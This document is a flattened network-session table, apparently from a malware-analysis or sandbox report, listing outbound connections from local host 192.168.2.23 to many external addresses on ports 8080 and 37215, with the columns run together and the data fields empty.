                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15097192.168.2.2334154159.240.255.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15098192.168.2.235634844.190.198.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15099192.168.2.2350690126.184.73.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15100192.168.2.2337260162.104.40.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15101192.168.2.2337858141.40.22.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15102192.168.2.2341526123.30.156.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15103192.168.2.234803865.21.37.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15104192.168.2.234761042.188.59.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15105192.168.2.2358274147.172.161.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15106192.168.2.2352216108.209.41.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15107192.168.2.2338408179.174.72.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15108192.168.2.2355954182.28.150.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15109192.168.2.23463285.197.52.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15110192.168.2.236006898.60.200.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15111192.168.2.2349858142.79.251.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15112192.168.2.233587267.176.165.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15113192.168.2.2340644180.140.111.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15114192.168.2.236058084.170.94.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15115192.168.2.2344324178.219.182.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15116192.168.2.234942846.165.187.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15117192.168.2.235611654.135.22.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15118192.168.2.2358756168.133.15.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15119192.168.2.2337304143.109.229.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15120192.168.2.2351110212.250.42.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15121192.168.2.2347366130.51.43.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15122192.168.2.23450442.191.118.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15123192.168.2.233500442.197.220.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15124192.168.2.235118892.195.82.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15125192.168.2.2340208197.185.197.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15126192.168.2.235128689.125.115.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15127192.168.2.2346208110.43.155.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15128192.168.2.2338098143.167.57.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15129192.168.2.234207270.202.219.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15130192.168.2.2333728186.178.95.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15131192.168.2.2342684189.9.227.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15132192.168.2.235361618.66.236.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15133192.168.2.233470849.201.184.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15134192.168.2.234974669.35.48.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15135192.168.2.2344824201.87.177.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15136192.168.2.2352578164.200.97.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15137192.168.2.233794023.32.201.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15138192.168.2.235854287.147.234.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15139192.168.2.2336582130.51.218.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15140192.168.2.2335378158.246.2.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15141192.168.2.2360380145.239.43.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15142192.168.2.234832660.141.42.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15143192.168.2.2360334144.178.12.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15144192.168.2.235897244.159.133.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15145192.168.2.2335296191.130.125.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15146192.168.2.234942674.48.87.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15147192.168.2.2344842131.59.226.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15148192.168.2.235336278.238.220.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15149192.168.2.233606069.251.1.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15150192.168.2.2353422174.105.219.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15151192.168.2.2345574147.147.26.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15152192.168.2.2333394121.83.210.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15153192.168.2.2334176143.89.224.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15154192.168.2.2338932151.118.132.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15155192.168.2.2349618149.93.176.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15156192.168.2.2347860204.69.252.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15157192.168.2.2341014101.66.136.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15158192.168.2.2340368223.15.19.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15159192.168.2.2355602101.178.0.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15160192.168.2.2335890113.65.19.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15161192.168.2.2338304197.108.211.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15162192.168.2.234988070.121.85.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15163192.168.2.2342938197.44.101.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15164192.168.2.2344570157.147.123.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15165192.168.2.2344950157.61.79.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15166192.168.2.2345770110.106.8.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15167192.168.2.2356876197.55.110.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15168192.168.2.235174658.71.95.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15169192.168.2.2348674156.160.4.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15170192.168.2.2348268115.235.124.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15171192.168.2.2349164105.101.39.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15172192.168.2.2334500152.32.125.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15173192.168.2.2340826147.171.108.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15174192.168.2.2357152190.172.247.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15175192.168.2.234668639.39.143.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15176192.168.2.2359066176.255.214.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15177192.168.2.2348148203.47.31.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15178192.168.2.2348140143.102.150.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15179192.168.2.234569451.112.210.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15180192.168.2.233747081.17.235.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15181192.168.2.235404099.197.204.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15182192.168.2.2348746154.34.118.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15183192.168.2.235837682.198.41.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15184192.168.2.2342132205.82.74.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15185192.168.2.2360496130.144.192.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15186192.168.2.2334784183.134.168.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15187192.168.2.2333330146.235.1.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15188192.168.2.234081663.231.195.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15189192.168.2.2338670199.180.74.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15190192.168.2.235441898.209.188.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15191192.168.2.234444040.42.186.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192192.168.2.2354786222.151.5.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15193192.168.2.234735051.71.74.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15194192.168.2.2352622126.150.86.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15195192.168.2.233509441.31.74.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15196192.168.2.234353420.212.236.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15197192.168.2.23578525.80.101.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15198192.168.2.2344800111.175.209.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15199192.168.2.234683627.201.206.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15200192.168.2.233280452.154.137.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15201192.168.2.2333796184.135.48.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15202192.168.2.2345360120.79.217.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15203192.168.2.2336032102.236.227.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15204192.168.2.2334378178.232.208.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15205192.168.2.2335318180.125.100.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15206192.168.2.235614895.224.214.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15207192.168.2.23440869.107.104.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15208192.168.2.233367684.236.176.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15209192.168.2.234331276.115.126.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15210192.168.2.2342092168.78.143.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15211192.168.2.2333474205.239.77.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15212192.168.2.234940223.121.150.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15213192.168.2.235638874.159.158.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15214192.168.2.2339082122.64.38.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15215192.168.2.234088861.50.106.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15216192.168.2.2341896148.123.188.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15217192.168.2.235249699.241.126.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15218192.168.2.2348104151.8.123.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15219192.168.2.2333272156.218.105.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15220192.168.2.23480624.129.159.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15221192.168.2.2358356199.77.38.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15222192.168.2.235908494.93.249.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15223192.168.2.2340550223.171.124.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15224192.168.2.2345096208.6.205.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15225192.168.2.235098636.56.254.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15226192.168.2.235358297.11.191.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15227192.168.2.2335678143.117.68.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15228192.168.2.234463058.89.9.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15229192.168.2.2345144183.45.31.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15230192.168.2.2345586112.31.104.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15231192.168.2.235539466.13.14.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15232192.168.2.2347150208.104.94.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15233192.168.2.233683487.156.164.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15234192.168.2.234748494.65.14.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15235192.168.2.235313014.219.200.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15236192.168.2.2352616141.124.252.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15237192.168.2.23427781.30.189.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15238192.168.2.2348940117.21.37.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15239192.168.2.233567669.55.164.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15240192.168.2.234324447.163.161.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15241192.168.2.2351678200.58.123.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15242192.168.2.234165432.28.243.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15243192.168.2.2350712146.206.75.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15244192.168.2.2340112152.117.13.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15245192.168.2.233561613.32.112.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15246192.168.2.2348382108.33.187.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15247192.168.2.236048275.173.253.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15248192.168.2.2353976196.160.43.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15249192.168.2.2350016187.30.196.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15250192.168.2.2349650116.204.187.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15251192.168.2.2339932186.198.151.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15252192.168.2.2353888180.13.61.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15253192.168.2.235353812.187.17.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15254192.168.2.236091231.15.235.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15255192.168.2.2359508155.159.177.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15256192.168.2.2333350126.13.89.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15257192.168.2.2335050125.138.16.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15258192.168.2.234707876.251.33.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15259192.168.2.233948658.34.117.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15260192.168.2.233916673.208.45.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15261192.168.2.2339152162.204.138.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15262192.168.2.2343076221.133.239.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15263192.168.2.2359138130.9.170.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15264192.168.2.23588622.100.160.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15265192.168.2.2360420161.145.188.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15266192.168.2.2335604122.154.5.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15267192.168.2.2342060157.245.40.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15268192.168.2.2341702219.167.63.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15269192.168.2.2338156133.107.219.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15270192.168.2.234824037.6.249.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15271192.168.2.233381459.10.61.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15272192.168.2.2347232103.10.51.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15273192.168.2.233585825.49.87.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15274192.168.2.234548483.196.138.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15275192.168.2.234867452.61.139.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15276192.168.2.2349568208.136.192.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15277192.168.2.2348706205.226.70.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15278192.168.2.2356800106.196.227.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15279192.168.2.234470080.75.45.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15280192.168.2.234796876.246.58.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15281192.168.2.2356122114.175.8.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15282192.168.2.234026877.214.58.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15283192.168.2.2342698212.214.37.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15284192.168.2.2350362151.159.71.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15285192.168.2.2340416184.105.178.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15286192.168.2.235819492.113.103.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15287192.168.2.2338466165.57.197.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15288192.168.2.2351862141.193.176.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15289192.168.2.2332944107.164.196.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15290192.168.2.2354388123.85.171.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15291192.168.2.235999495.218.138.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15292192.168.2.2348002120.226.96.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15293192.168.2.2347654124.152.76.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15294192.168.2.2341176160.209.238.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15295192.168.2.2353598120.162.31.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15296192.168.2.2348300184.122.161.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15297192.168.2.235294861.26.38.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15298192.168.2.2348872174.46.48.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15299192.168.2.2360630202.24.25.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15300192.168.2.234168667.248.175.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15301192.168.2.233888889.140.76.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15302192.168.2.234945689.156.144.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15303192.168.2.2357200175.168.252.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15304192.168.2.235360051.155.202.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15305192.168.2.2340934206.215.118.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15306192.168.2.23337482.252.105.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
